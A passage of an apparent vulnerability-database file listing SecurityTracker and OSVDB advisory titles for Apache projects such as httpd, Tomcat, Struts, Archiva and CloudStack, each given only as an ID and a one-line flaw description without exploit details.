16526| [1027096] Apache Commons Compress BZip2CompressorOutputStream() Sorting Algorithm Lets Remote or Local Users Deny Service
16527| [1026932] Apache LD_LIBRARY_PATH Processing Lets Local Users Gain Elevated Privileges
16528| [1026928] Apache OFBiz Unspecified Flaw Lets Remote Users Execute Arbitrary Code
16529| [1026927] Apache OFBiz Input Validation Flaws Permit Cross-Site Scripting Attacks
16530| [1026847] Apache Traffic Server Host Header Processing Flaw Lets Remote Users Deny Service
16531| [1026846] Apache Wicket Discloses Hidden Application Files to Remote Users
16532| [1026839] Apache Wicket Input Validation Flaw in 'wicket:pageMapName' Parameter Permits Cross-Site Scripting Attacks
16533| [1026616] Apache Bugs Let Remote Users Deny Service and Obtain Cookie Data
16534| [1026575] Apache Struts ParameterInterceptor() Flaw Lets Remote Users Execute Arbitrary Commands
16535| [1026484] Apache Struts Bug Lets Remote Users Overwrite Files and Execute Arbitrary Code
16536| [1026477] Apache Tomcat Hash Table Collision Bug Lets Remote Users Deny Service
16537| [1026402] Apache Struts Conversion Error Lets Remote Users Inject Arbitrary Commands
16538| [1026353] Apache mod_proxy/mod_rewrite Bug Lets Remote Users Access Internal Servers
16539| [1026295] Apache Tomcat Lets Untrusted Web Applications Gain Elevated Privileges
16540| [1026267] Apache .htaccess File Integer Overflow Lets Local Users Execute Arbitrary Code
16541| [1026144] Apache mod_proxy Pattern Matching Bug Lets Remote Users Access Internal Servers
16542| [1026095] Apache Tomcat HTTP DIGEST Authentication Weaknesses Let Remote Users Conduct Bypass Attacks
16543| [1026054] Apache mod_proxy_ajp HTTP Processing Error Lets Remote Users Deny Service
16544| [1025993] Apache Tomcat AJP Protocol Processing Bug Lets Remote Users Bypass Authentication or Obtain Information
16545| [1025976] Apache Wicket Input Validation Flaw Permits Cross-Site Scripting Attacks
16546| [1025960] Apache httpd Byterange Filter Processing Error Lets Remote Users Deny Service
16547| [1025925] Apache Tomcat Commons Daemon jsvc Lets Local Users Gain Elevated Privileges
16548| [1025924] Apache Tomcat XML Validation Flaw Lets Applications Obtain Potentially Sensitive Information
16549| [1025788] Apache Tomcat Lets Malicious Applications Obtain Information and Deny Service
16550| [1025755] Apache Santuario Buffer Overflow Lets Remote Users Deny Service
16551| [1025712] Apache Tomcat Discloses Passwords to Local Users in Certain Cases
16552| [1025577] Apache Archiva Input Validation Hole Permits Cross-Site Scripting Attacks
16553| [1025576] Apache Archiva Request Validation Flaw Permits Cross-Site Request Forgery Attacks
16554| [1025527] Apache APR Library apr_fnmatch() Flaw Lets Remote Users Execute Arbitrary Code
16555| [1025303] Apache Tomcat HTTP BIO Connector Error Discloses Information From Different Requests to Remote Users
16556| [1025215] Apache Tomcat May Ignore @ServletSecurity Annotation Protections
16557| [1025066] Apache Continuum Input Validation Flaw Permits Cross-Site Request Forgery Attacks
16558| [1025065] Apache Continuum Input Validation Hole Permits Cross-Site Scripting Attacks
16559| [1025027] Apache Tomcat maxHttpHeaderSize Parsing Error Lets Remote Users Deny Service
16560| [1025026] Apache Tomcat Manager Input Validation Hole Permits Cross-Site Scripting Attacks
16561| [1025025] Apache Tomcat Security Manager Lets Local Users Bypass File Permissions
16562| [1024764] Apache Tomcat Manager Input Validation Hole in 'sessionList.jsp' Permits Cross-Site Scripting Attacks
16563| [1024417] Apache Traffic Server Insufficient Randomization Lets Remote Users Poison the DNS Cache
16564| [1024332] Apache mod_cache and mod_dav Request Processing Flaw Lets Remote Users Deny Service
16565| [1024180] Apache Tomcat 'Transfer-Encoding' Header Processing Flaw Lets Remote Users Deny Service and Obtain Potentially Sensitive Information
16566| [1024096] Apache mod_proxy_http May Return Results for a Different Request
16567| [1023942] Apache mod_proxy_ajp Error Condition Lets Remote Users Deny Service
16568| [1023941] Apache ap_read_request() Memory Error May Let Remote Users Access Potentially Sensitive Information
16569| [1023778] Apache ActiveMQ Input Validation Flaw Permits Cross-Site Scripting Attacks
16570| [1023701] Apache mod_isapi Error Processing Flaw May Let Remote Users Deny Service
16571| [1023533] Apache mod_proxy Integer Overflow May Let Remote Users Execute Arbitrary Code
16572| [1022988] Apache Solaris Support Code Bug Lets Remote Users Deny Service
16573| [1022529] Apache mod_deflate Connection State Bug Lets Remote Users Deny Service
16574| [1022509] Apache mod_proxy stream_reqbody_cl() Infinite Loop Lets Remote Users Deny Service
16575| [1022296] Apache IncludesNoExec Options Restrictions Can Be Bypass By Local Users
16576| [1022264] Apache mod_proxy_ajp Bug May Disclose Another User's Response Data
16577| [1022001] Apache Tomcat mod_jk May Disclose Responses to the Wrong User
16578| [1021988] mod_perl Input Validation Flaw in Apache::Status and Apache2::Status Permits Cross-Site Scripting Attacks
16579| [1021350] NetWare Bug Lets Remote Users Access the ApacheAdmin Console
16580| [1020635] Apache Input Validation Hole in mod_proxy_ftp Permits Cross-Site Scripting Attacks
16581| [1020520] Oracle WebLogic Apache Connector Lets Remote Users Execute Arbitrary Code
16582| [1020267] Apache mod_proxy Interim Response Process Bug Lets Remote Users Deny Service
16583| [1019784] Apache-SSL Certificate Processing Bug May Let Remote Users View Portions of Kernel Memory
16584| [1019256] Apache mod_negotiation Input Validation Hole Permits Cross-Site Scripting Attacks
16585| [1019194] Apache Input Validation Hole in Mod_AutoIndex When the Character Set is Undefined May Permit Cross-Site Scripting Attacks
16586| [1019185] Apache Input Validation Hole in mod_proxy_ftp Permits Cross-Site Scripting Attacks
16587| [1019154] Apache Input Validation Hole in mod_status Permits Cross-Site Scripting Attacks
16588| [1019093] Apache Input Validation Hole in mod_imap Permits Cross-Site Scripting Attacks
16589| [1019030] Apache Input Validation Hole in Default HTTP 413 Error Page Permits Cross-Site Scripting Attacks
16590| [1018633] Apache mod_proxy Bug Lets Remote Users Deny Service
16591| [1018304] Apache HTTPD scoreboard Protection Flaw Lets Local Users Terminate Arbitrary Processes
16592| [1018303] Apache HTTPD mod_cache May Let Remote Users Deny Service
16593| [1018302] Apache mod_status Input Validation Hole Permits Cross-Site Scripting Attacks
16594| [1018269] Apache Tomcat Input Validation Hole in Processing Accept-Language Header Permits Cross-Site Scripting Attacks
16595| [1017904] Apache suEXEC Bugs May Let Local Users Gain Elevated Privileges
16596| [1017719] Apache Tomcat JK Web Server Connector Buffer Overflow in map_uri_to_worker() Lets Remote Users Execute Arbitrary Code
16597| [1017062] Apache mod_tcl Format String Bug in set_var() Function May Let Remote Users Execute Arbitrary Code
16598| [1016601] Apache mod_rewrite Off-by-one Error Lets Remote Users Execute Arbitrary Code
16599| [1016576] Apache Tomcat Discloses Directory Listings to Remote Users
16600| [1015447] Apache mod_ssl Null Pointer Dereference May Let Remote Users Deny Service
16601| [1015344] Apache mod_imap Input Validation Flaw in Referer Field Lets Remote Users Conduct Cross-Site Scripting Attacks
16602| [1015093] Apache Memory Leak in MPM 'worker.c' Code May Let Remote Users Deny Service
16603| [1014996] ApacheTop Unsafe Temporary File May Let Local Users Gain Elevated Privileges
16604| [1014833] Apache ssl_hook_Access() Function May Fail to Verify Client Certificates
16605| [1014826] Apache Memory Leak in 'byterange filter' Lets Remote Users Deny Service
16606| [1014575] Apache mod_ssl Off-by-one Buffer Overflow in Processing CRLs May Let Remote Users Deny Service
16607| [1014323] Apache Chunked Transfer-Encoding and Content-Length Processing Lets Remote Users Smuggle HTTP Requests
16608| [1013156] Apache mod_python Publisher Handler Discloses Information to Remote Users
16609| [1012829] Apache mod_auth_radius radcpy() Integer Overflow Lets Remote Users Deny Service in Certain Cases
16610| [1012416] Apache on Apple OS X Lets Remote Users Bypass Apache File Handlers and Directly Access Files
16611| [1012415] Apache on Apple HFS+ Filesystems May Disclose '.DS_Store' Files to Remote Users
16612| [1012414] Apache mod_digest_apple Lets Remote Users Replay Authentication Credentials
16613| [1012083] Apache Web Server Error in Processing Requests With Many Space Characters Lets Remote Users Deny Service
16614| [1011783] Apache mod_include Buffer Overflow Lets Local Users Execute Arbitrary Code
16615| [1011557] Apache mod_ssl SSLCipherSuite Directive Can By Bypassed in Certain Cases
16616| [1011385] Apache Satsify Directive Error May Let Remote Users Access Restricted Resources
16617| [1011340] Apache SSL Connection Abort State Error Lets Remote Users Deny Service
16618| [1011303] Apache ap_resolve_env() Buffer Overflow in Reading Configuration Files May Let Local Users Gain Elevated Privileges
16619| [1011299] Apache IPv6 Address Parsing Flaw May Let Remote Users Deny Service
16620| [1011248] Apache mod_dav LOCK Method Error May Let Remote Users Deny Service
16621| [1011213] Apache mod_ssl Can Be Crashed By Remote Users When Reverse Proxying SSL Connections
16622| [1010674] Apache Can Be Crashed By PHP Code Invoking Nested Remote Sockets
16623| [1010599] Apache httpd Header Line Memory Allocation Lets Remote Users Crash the Server
16624| [1010462] Apache mod_proxy Buffer Overflow May Let Remote Users Execute Arbitrary Code
16625| [1010322] Apache mod_ssl Stack Overflow in ssl_util_uuencode_binary() May Let Remote Users Execute Arbitrary Code
16626| [1010270] cPanel Apache mod_phpsuexec Options Let Local Users Gain Elevated Privileges
16627| [1009934] Apache Web Server Has Buffer Overflow in ebcdic2ascii() on Older Processor Architectures
16628| [1009516] Apache mod_survey HTML Report Format Lets Remote Users Conduct Cross-Site Scripting Attacks
16629| [1009509] Apache mod_disk_cache Stores Authentication Credentials on Disk
16630| [1009495] Apache Web Server Socket Starvation Flaw May Let Remote Users Deny Service
16631| [1009417] GroupWise WebAccess With Apache on NetWare Has Configuration Flaw That May Grant Web Access to Remote Users
16632| [1009338] Apache mod_access Parsing Flaw May Fail to Enforce Allow/Deny Rules
16633| [1009337] Apache mod_ssl Memory Leak Lets Remote Users Crash the Daemon
16634| [1009182] Apache for Cygwin '..%5C' Input Validation Flaw Discloses Files to Remote Users
16635| [1008973] PHP May Apply Incorrect php_admin_* Settings To Requests for Apache Virtual Hosts
16636| [1008967] Apache-SSL 'SSLFakeBasicAuth' Lets Remote Users Forge Client Certificates to Be Authenticated
16637| [1008920] Apache mod_digest May Validate Replayed Client Responses
16638| [1008828] Apache mod_python String Processing Bug Still Lets Remote Users Crash the Web Server
16639| [1008822] Apache mod_perl File Descriptor Leak May Let Local Users Hijack the http and https Services
16640| [1008675] mod_auth_shadow Apache Module Authenticates Expired Passwords
16641| [1008559] Apache mod_php File Descriptor Leak May Let Local Users Hijack the https Service
16642| [1008335] Apache mod_python String Processing Bug Lets Remote Users Crash the Web Server
16643| [1008196] Apache 2.x on Windows May Return Unexpected Files For URLs Ending With Certain Characters
16644| [1008030] Apache mod_rewrite Contains a Buffer Overflow
16645| [1008029] Apache mod_alias Contains a Buffer Overflow
16646| [1008028] Apache mod_cgid May Disclose CGI Output to Another Client
16647| [1007995] Apache Cocoon Forms May Let Remote Users Execute Arbitrary Java Code on the System
16648| [1007993] Apache Cocoon 'view-source' Sample Script Discloses Files to Remote Users
16649| [1007823] Apache Web Server mod_cgi Error May Let Malicious CGI Scripts Crash the Web Service
16650| [1007664] Apache::Gallery Unsafe Temporary Files May Let Local Users Gain Apache Web Server Privileges
16651| [1007557] Apache Web Server Does Not Filter Terminal Escape Sequences From Log Files
16652| [1007230] Apache HTTP Server 'rotatelogs' Bug on Win32 and OS/2 May Cause the Logging to Stop
16653| [1007146] Apache HTTP Server FTP Proxy Bug May Cause Denial of Service Conditions
16654| [1007145] Apache 'accept()' Errors May Cause Denial of Service Conditions
16655| [1007144] Apache Web Server 'type-map' File Error Permits Local Denial of Service Attacks
16656| [1007143] Apache 2.0 Web Server May Use a Weaker Encryption Implementation Than Specified in Some Cases
16657| [1006864] Apache Web Server Can Be Crashed By Remote Users Via mod_dav Flaws and Also Via Basic Authentication
16658| [1006709] Apache mod_survey Input Validation Flaw Lets Remote Users Fill Up Disk Space
16659| [1006614] Apache mod_ntlm Buffer Overflow and Format String Flaw Let Remote Users Execute Arbitary Code
16660| [1006591] Apache mod_access_referer Module Null Pointer Dereference May Faciliate Denial of Service Attacks
16661| [1006444] Apache 2.0 Web Server Line Feed Buffer Allocation Flaw Lets Remote Users Deny Service
16662| [1006021] Apache Tomcat Server URL Parsing Error May Disclose Otherwise Inaccessible Web Directory Listings and Files to Remote Users
16663| [1005963] Apache Web Server 2.x Windows Device Access Flaw Lets Remote Users Crash the Server or Possibly Execute Arbitrary Code
16664| [1005962] Apache Web Server Path Parsing Flaw May Allow Remote Users to Execute Code in Certain Configurations
16665| [1005848] Apache 'printenv' Script Input Validation Bugs in Older Versions May Let Remote Users Conduct Cross-Site Scripting Attacks
16666| [1005765] Apache mod_jk Module Processing Bug When Used With Tomcat May Disclose Information to Remote Users or Crash
16667| [1005548] Apache mod_php Module May Allow Local Users to Gain Control of the Web Port
16668| [1005499] Apache Web Server (2.0.42) May Disclose CGI Source Code to Remote Users When Used With WebDAV
16669| [1005410] Apache Tomcat Java Servlet Engine Can Be Crashed Via Multiple Requests for DOS Device Names
16670| [1005351] Apache Web Server (1.3.x) Shared Memory Scoreboard Bug Lets Certain Local Users Issue Signals With Root Privileges
16671| [1005331] Apache Web Server (2.x) SSI Server Signature Filtering Hole Lets Remote Users Conduct Cross-Site Scripting Attacks
16672| [1005290] Apache Tomcat Java Server Default Servlet Returns JSP Source Code to Remote Users
16673| [1005285] Apache Web Server 'mod_dav' Has Null Pointer Bug That May Allow Remote Users to Cause Denial of Service Conditions
16674| [1005010] Apache Web Server (2.0) Has Unspecified Flaw That Allows Remote Users to Obtain Sensitive Data and Cause Denial of Service Conditions
16675| [1004770] Apache 2.x Web Server ap_log_rerror() Function May Disclose Full Installation Path to Remote Users
16676| [1004745] Apache Tomcat Java Server Allows Cross-Site Scripting Attacks
16677| [1004636] Apache mod_ssl 'Off-by-One' Bug May Let Local Users Crash the Web Server or Possibly Execute Arbitrary Code
16678| [1004602] Apache Tomcat Java Server for Windows Can Be Crashed By Remote Users Sending Malicious Requests to Hang All Available Working Threads
16679| [1004586] Apache Tomcat Java Server May Disclose the Installation Path to Remote Users
16680| [1004555] Apache Web Server Chunked Encoding Flaw May Let Remote Users Execute Arbitrary Code on the Server
16681| [1004209] Apache 'mod_python' Python Language Interpreter Bug in Publisher Handler May Allow Remote Users to Modify Files on the System
16682| [1003874] Apache Web Server for Windows Has Batch File Processing Hole That Lets Remote Users Execute Commands on the System
16683| [1003767] 'mod_frontpage' Module for Apache Web Server Has Buffer Overlow in 'fpexec.c' That Allows Remote Users to Execute Arbitrary Code on the System with Root Privileges
16684| [1003723] Apache-SSL for Apache Web Server Has Buffer Overflow That Can Be Triggered By Remote Users
16685| [1003664] 'mod_ssl' Security Package for Apache Web Server Has Buffer Overflow That Can Be Triggered By Remote Users
16686| [1003602] GNUJSP Java Server Pages Implementation Discloses Web Files and Source Code to Remote Users and Bypasses Apache Access Control Restrictions
16687| [1003465] PHP for Apache Web Server May Disclose Installation Path Information to Remote Users Making 'OPTIONS' Requests
16688| [1003451] Oracle Application Server PL/SQL Module for Apache Has Buffer Overflows That Allow Remote Users to Execute Arbitrary Code and Gain Access to the Server
16689| [1003131] Apache Web Server in Virtual Hosting Mode Can Be Crashed By a Local User Removing a Log Directory
16690| [1003104] PHP.EXE Windows CGI for Apache Web Server May Let Remote Users View Files on the Server Due to Configuration Error
16691| [1003008] Apache 'mod_bf' Module Lets Remote Users Execute Arbitrary Code
16692| [1002629] Apache suEXEC Wrapper Fails to Observe Minimum Group ID Security Settings in Certain Situations
16693| [1002542] Apache Web Server Virtual Hosting Split-Logfile Function Lets Remote Users Write Log Entries to Arbitrary Files on the System
16694| [1002400] Apache mod_gzip Module Has Buffer Overflow That Can Be Exploited By Local Users to Gain Elevated Privileges
16695| [1002303] Several 3rd Party Apache Authentication Modules Allow Remote Users to Execute Arbitrary Code to Gain Access to the System or Execute Stored Procedures to Obtain Arbitrary Database Information
16696| [1002188] Apache Web Server Discloses Internal IP Addresses to Remote Users in Certain Configurations
16697| [1001989] Apache Web Server May Disclose Directory Contents Even If an Index.html File is Present in the Directory
16698| [1001719] Apache Web Server on Mac OS X Client Fails to Enforce File and Directory Access Protections, Giving Remote Users Access to Restricted Pages
16699| [1001572] Apache Web Server on Microsoft Windows Platforms Allows Remote Users to Crash the Web Server
16700| [1001304] Apache Web Server for Windows Lets Remote Users Crash the Web Server Application
16701| [1001083] Apache Web Server May Display Directory Index Listings Even if Directory Listings Are Disabled
16702|
16703| OSVDB - http://www.osvdb.org:
16704| [96078] Apache CloudStack Infrastructure Menu Setup Network Multiple Field XSS
16705| [96077] Apache CloudStack Global Settings Multiple Field XSS
16706| [96076] Apache CloudStack Instances Menu Display Name Field XSS
16707| [96075] Apache CloudStack Instances Menu Add Instances Network Name Field XSS
16708| [96074] Apache CloudStack Instances Menu Add Instances Review Step Multiple Field XSS
16709| [96031] Apache HTTP Server suEXEC Symlink Arbitrary File Access
16710| [95888] Apache Archiva Single / Double Quote Character Handling XSS Weakness
16711| [95885] Apache Subversion mod_dav_svn Module Crafted HTTP Request Handling Remote DoS
16712| [95706] Apache OpenOffice.org (OOo) OOXML Document File XML Element Handling Memory Corruption
16713| [95704] Apache OpenOffice.org (OOo) DOC File PLCF Data Handling Memory Corruption
16714| [95603] Apache Continuum web/util/GenerateRecipentNotifier.java recipient Parameter XSS
16715| [95602] Apache Continuum web/action/notifier/JabberProjectNotifierEditAction-jabberProjectNotifierSave-validation.xml Multiple Parameter XSS
16716| [95601] Apache Continuum web/action/notifier/JabberGroupNotifierEditAction-jabberProjectGroupNotifierSave-validation.xml Multiple Parameter XSS
16717| [95600] Apache Continuum web/action/ScheduleAction-saveSchedule-validation.xml Multiple Parameter XSS
16718| [95599] Apache Continuumweb/action/BuildDefinitionAction-saveBuildDefinition-validation.xml Multiple Parameter XSS
16719| [95598] Apache Continuum web/action/AddProjectAction-addProject-validation.xml Multiple Parameter XSS
16720| [95597] Apache Continuum web/action/ProjectEditAction-projectSave-validation.xml Multiple Parameter XSS
16721| [95596] Apache Continuum web/action/notifier/IrcGroupNotifierEditAction-ircProjectGroupNotifierSave-validation.xml Multiple Parameter XSS
16722| [95595] Apache Continuum web/action/notifier/IrcProjectNotifierEditAction-ircProjectNotifierSave-validation.xml Multiple Parameter XSS
16723| [95594] Apache Continuum web/action/ProjectGroupAction.java Multiple Parameter XSS
16724| [95593] Apache Continuum web/action/AddProjectGroupAction.java Multiple Parameter XSS
16725| [95592] Apache Continuum web/action/AddProjectAction.java Multiple Parameter XSS
16726| [95523] Apache OFBiz Webtools Application View Log Screen Unspecified XSS
16727| [95522] Apache OFBiz Nested Expression Evaluation Arbitrary UEL Function Execution
16728| [95521] Apache HTTP Server mod_session_dbd Session Saving Unspecified Issue
16729| [95498] Apache HTTP Server mod_dav.c Crafted MERGE Request Remote DoS
16730| [95406] Apache Struts DefaultActionMapper Multiple Prefixing Parameters Arbitrary Site Redirect
16731| [95405] Apache Struts DefaultActionMapper Multiple Prefixing Parameters Remote Code Execution
16732| [95011] Apache CXF XML Parser SOAP Message Handling CPU Resource Exhaustion Remote DoS
16733| [94705] Apache Geronimo RMI Classloader Exposure Serialized Object Handling Remote Code Execution
16734| [94651] Apache Santuario (XML Security for C++) XML Signature CanonicalizationMethod Parameter Spoofing Weakness
16735| [94636] Apache Continuum workingCopy.action userDirectory Traversal Arbitrary File Access
16736| [94635] Apache Maven SCM SvnCommandlineUtils Process Listing Local Password Disclosure
16737| [94632] Apache Maven Wagon SSH (wagon-ssh) Host Verification Failure MitM Weakness
16738| [94625] Apache Santuario (XML Security for C++) XML Signature Reference Crafted XPointer Expression Handling Heap Buffer Overflow
16739| [94618] Apache Archiva /archiva/security/useredit.action username Parameter XSS
16740| [94617] Apache Archiva /archiva/security/roleedit.action name Parameter XSS
16741| [94616] Apache Archiva /archiva/security/userlist!show.action roleName Parameter XSS
16742| [94615] Apache Archiva /archiva/deleteArtifact!doDelete.action groupId Parameter XSS
16743| [94614] Apache Archiva /archiva/admin/addLegacyArtifactPath!commit.action legacyArtifactPath.path Parameter XSS
16744| [94613] Apache Archiva /archiva/admin/addRepository.action Multiple Parameter XSS
16745| [94612] Apache Archiva /archiva/admin/editAppearance.action Multiple Parameter XSS
16746| [94611] Apache Archiva /archiva/admin/addLegacyArtifactPath.action Multiple Parameter XSS
16747| [94610] Apache Archiva /archiva/admin/addNetworkProxy.action Multiple Parameter XSS
16748| [94403] Apache Santuario (XML Security for C++) InclusiveNamespace PrefixList Processing Heap Overflow
16749| [94402] Apache Santuario (XML Security for C++) HMAC-based XML Signature Processing DoS
16750| [94401] Apache Santuario (XML Security for C++) XPointer Evaluation Stack Overflow
16751| [94400] Apache Santuario (XML Security for C++) HMAC-Based XML Signature Reference Element Validation Spoofing Weakness
16752| [94279] Apache Qpid CA Certificate Validation Bypass
16753| [94275] Apache Solr JettySolrRunner.java Can Not Find Error Message XSS
16754| [94233] Apache OpenJPA Object Deserialization Arbitrary Executable Creation
16755| [94042] Apache Axis JAX-WS Java Unspecified Exposure
16756| [93969] Apache Struts OGNL Expression Handling Double Evaluation Error Remote Command Execution
16757| [93796] Apache Subversion Filename Handling FSFS Repository Corruption Remote DoS
16758| [93795] Apache Subversion svnserve Server Aborted Connection Message Handling Remote DoS
16759| [93794] Apache Subversion contrib/hook-scripts/check-mime-type.pl svnlook Hyphenated argv Argument Handling Remote DoS
16760| [93793] Apache Subversion contrib/hook-scripts/svn-keyword-check.pl Filename Handling Remote Command Execution
16761| [93646] Apache Struts Crafted Parameter Arbitrary OGNL Code Execution
16762| [93645] Apache Struts URL / Anchor Tag includeParams Attribute Remote Command Execution
16763| [93636] Apache Pig Multiple Physical Operator Memory Exhaustion Remote Remote DoS
16764| [93635] Apache Wink DTD (Document Type Definition) Expansion Data Parsing Information Disclosure
16765| [93605] RT Apache::Session::File Session Replay Reuse Information Disclosure
16766| [93599] Apache Derby SYSCS_UTIL.SYSCS_SET_DATABASE_PROPERTY Boot Password Manipulation Re-encryption Failure Password Corruption
16767| [93555] Apache Commons Codec Invalid Base32 String Information Tunneling Weakness
16768| [93554] Apache HBase bulkLoadHFiles() Method ACL Bypass
16769| [93543] JBoss Enterprise Application Platform org.apache.catalina.connector.Response.encodeURL() Method MitM jsessionid Disclosure
16770| [93542] Apache ManifoldCF (Connectors Framework) org.apache.manifoldcf.crawler.ExportConfiguration Class Configuration Export Password Disclosure
16771| [93541] Apache Solr json.wrf Callback XSS
16772| [93524] Apache Hadoop GetSecurityDescriptorControl() Function Absolute Security Descriptor Handling NULL Descriptor Weakness
16773| [93521] Apache jUDDI Security API Token Session Persistence Weakness
16774| [93520] Apache CloudStack Default SSL Key Weakness
16775| [93519] Apache Shindig /ifr Cross-site Arbitrary Gadget Invocation
16776| [93518] Apache Solr /admin/analysis.jsp name Parameter XSS
16777| [93517] Apache CloudStack setup-cloud-management /etc/sudoers Modification Local Privilege Escalation
16778| [93516] Apache CXF UsernameTokenInterceptor Nonce Caching Replay Weakness
16779| [93515] Apache HBase table.jsp name Parameter XSS
16780| [93514] Apache CloudStack Management Server Unauthenticated Remote JMX Connection Default Setting Weakness
16781| [93463] Apache Struts EL / OGNL Interpretation Unspecified Remote Code Execution
16782| [93462] Apache CXF WS-SecurityPolicy AlgorithmSuite Arbitrary Ciphertext Decryption Weakness
16783| [93401] Apache Hadoop core-site.xml Permission Weakness Local Alfredo Secret Disclosure
16784| [93400] Apache Hadoop Map/Reduce Job Log Directory Symlink Arbitrary File Mode Manipulation
16785| [93397] Apache Wicket Referrer HTTP Header Session ID Disclosure
16786| [93366] Apache HTTP Server modules/mappers/mod_rewrite.c do_rewritelog() Function Log File Terminal Escape Sequence Filtering Remote Command Execution
16787| [93254] Apache Tomcat AsyncListener Method Cross-session Information Disclosure
16788| [93253] Apache Tomcat Chunked Transfer Encoding Data Saturation Remote DoS
16789| [93252] Apache Tomcat FORM Authenticator Session Fixation
16790| [93172] Apache Camel camel/endpoints/ Endpoint XSS
16791| [93171] Apache Sling HtmlResponse Error Message XSS
16792| [93170] Apache Directory DelegatingAuthenticator MitM Spoofing Weakness
16793| [93169] Apache Wave AuthenticationServlet.java Session Fixation Weakness
16794| [93168] Apache Click ErrorReport.java id Parameter XSS
16795| [93167] Apache ActiveMQ JMSXUserId Spoofing Weakness
16796| [93166] Apache CXF Crafted Message Element Count Handling System Resource Exhaustion Remote DoS
16797| [93165] Apache CXF Crafted Message Element Level Handling System Resource Exhaustion Remote DoS
16798| [93164] Apache Harmony DatagramSocket Class connect Method CheckAccept() IP Blacklist Bypass
16799| [93163] Apache Hadoop Map/Reduce Daemon Symlink Arbitrary File Overwrite
16800| [93162] Apache VelocityStruts struts/ErrorsTool.getMsgs Error Message XSS
16801| [93161] Apache CouchDB Rewriter VM Atom Table Memory Exhaustion Remote DoS
16802| [93158] Apache Wicket BookmarkablePageLink Feature XSS CSRF
16803| [93157] Apache Struts UrlHelper.java s:url includeParams Functionality XSS
16804| [93156] Apache Tapestry Calendar Component datefield.js datefield Parameter XSS
16805| [93155] Apache Struts fielderror.ftl fielderror Parameter Error Message XSS
16806| [93154] Apache JSPWiki Edit.jsp createPages WikiPermission Bypass
16807| [93153] Apache PDFBox PDFXrefStreamParser Missing Element Handling PDF Parsing DoS
16808| [93152] Apache Hadoop HttpServer.java Multiple Function XSS
16809| [93151] Apache Shiro Search Filter userName Parameter LDAP Code Injection Weakness
16810| [93150] Apache Harmony java.net.SocketPermission Class boolean equals Function checkConnect() Weakness Host Name Retrieval
16811| [93149] Apache Harmony java.security.Provider Class void load Function checkSecurityAccess() Weakness
16812| [93148] Apache Harmony java.security.ProtectionDomain Class java.lang.String.toString() Function checkPermission() Weakness
16813| [93147] Apache Harmony java.net.URLConnection openConnection Function checkConnect Weakness Proxy Connection Permission Bypass
16814| [93146] Apache Harmony java.net.ServerSocket Class void implAccept Function checkAccept() Weakness SerSocket Subclass Creation
16815| [93145] Apache Qpid JMS Client Detached Session Frame Handling NULL Pointer Dereference Remote DoS
16816| [93144] Apache Solr Admin Command Execution CSRF
16817| [93009] Apache VCL XMLRPC API Unspecified Function Remote Privilege Escalation
16818| [93008] Apache VCL Web GUI Unspecified Remote Privilege Escalation
16819| [92997] Apache Commons Codec org.apache.commons.codec.net.URLCodec Fields Missing 'final' Thread-safety Unspecified Issue
16820| [92976] Apache ActiveMQ scheduled.jsp crontab Command XSS
16821| [92947] Apache Commons Codec org.apache.commons.codec.language.Soundex.US_ENGLISH_MAPPING Missing MS_PKGPROTECT Field Manipulation Unspecified Issue
16822| [92749] Apache CloudStack Predictable Hash Virtual Machine Console Console Access URL Generation
16823| [92748] Apache CloudStack VM Console Access Restriction Bypass
16824| [92709] Apache ActiveMQ Web Console Unauthenticated Remote Access
16825| [92708] Apache ActiveMQ Sample Web Application Broker Resource Consumption Remote DoS
16826| [92707] Apache ActiveMQ webapp/websocket/chat.js Subscribe Message XSS
16827| [92706] Apache ActiveMQ Debug Log Rendering XSS
16828| [92705] Apache ActiveMQ PortfolioPublishServlet.java refresh Parameter XSS
16829| [92270] Apache Tomcat Unspecified CSRF
16830| [92094] Apache Subversion mod_dav_svn Module Nonexistent URL Lock Request Handling NULL Pointer Dereference Remote DoS
16831| [92093] Apache Subversion mod_dav_svn Module Activity URL PROPFIND Request Handling NULL Pointer Dereference Remote DoS
16832| [92092] Apache Subversion mod_dav_svn Module Log REPORT Request Handling NULL Pointer Dereference Remote DoS
16833| [92091] Apache Subversion mod_dav_svn Module Node Property Handling Resource Exhaustion Remote DoS
16834| [92090] Apache Subversion mod_dav_svn Module Activity URL Lock Request Handling NULL Pointer Dereference Remote DoS
16835| [91774] Apache Commons Codec Unspecified Non-private Field Manipulation Weakness
16836| [91628] mod_ruid2 for Apache HTTP Server fchdir() Inherited File Descriptor chroot Restriction Bypass
16837| [91328] Apache Wicket $up$ Traversal Arbitrary File Access
16838| [91295] Apple Mac OS X Apache Unicode Character URI Handling Authentication Bypass
16839| [91235] Apache Rave /app/api/rpc/users/get User Object Hashed Password Remote Disclosure
16840| [91185] Munin Default Apache Configuration Permission Weakness Remote Information Disclosure
16841| [91173] Apache Wicket WebApplicationPath Constructor Bypass /WEB-INF/ Directory File Access
16842| [91172] Apache Wicket PackageResourceGuard File Extension Filter Bypass
16843| [91025] Apache Qpid qpid::framing::Buffer Class Multiple Method Out-of-bounds Access Remote DoS
16844| [91024] Apache Qpid federation_tag Attribute Handling Federated Interbroker Link Access Restriction Bypass
16845| [91023] Apache Qpid AMQP Type Decoder Exposure Array Size Value Handling Memory Consumption Remote DoS
16846| [91022] Apache Qpid qpid/cpp/include/qpid/framing/Buffer.h qpid::framing::Buffer::checkAvailable() Function Integer Overflow
16847| [90986] Apache Jena ARQ INSERT DATA Request Handling Overflow
16848| [90907] Apache Subversion mod_dav_svn / libsvn_fs svn_fs_file_length() Function MKACTIVITY / PROPFIND Option Request Handling Remote DoS
16849| [90906] Apache Commons FileUpload /tmp Storage Symlink Arbitrary File Overwrite
16850| [90864] Apache Batik 1xx Redirect Script Origin Restriction Bypass
16851| [90858] Apache Ant Malformed TAR File Handling Infinite Loop DoS
16852| [90852] Apache HTTP Server for Debian apachectl /var/lock Permission Weakness Symlink Directory Permission Manipulation
16853| [90804] Apache Commons CLI Path Subversion Local Privilege Escalation
16854| [90802] Apache Avro Recursive Schema Handling Infinite Recursion DoS
16855| [90592] Apache Batik ApplicationSecurityEnforcer.java Multiple Method Security Restriction Bypass
16856| [90591] Apache Batik XML External Entity (XXE) Data Parsing Arbitrary File Disclosure
16857| [90565] Apache Tomcat Log Directory Permission Weakness Local Information Disclosure
16858| [90564] Apache Maven / Maven Wagon SSL Certificate Validation MitM Spoofing Weakness
16859| [90557] Apache HTTP Server mod_proxy_balancer balancer-manager Interface Multiple Parameter XSS
16860| [90556] Apache HTTP Server Multiple Module Multiple Parameter XSS
16861| [90276] Apache Axis2 axis2.xml Plaintext Password Local Disclosure
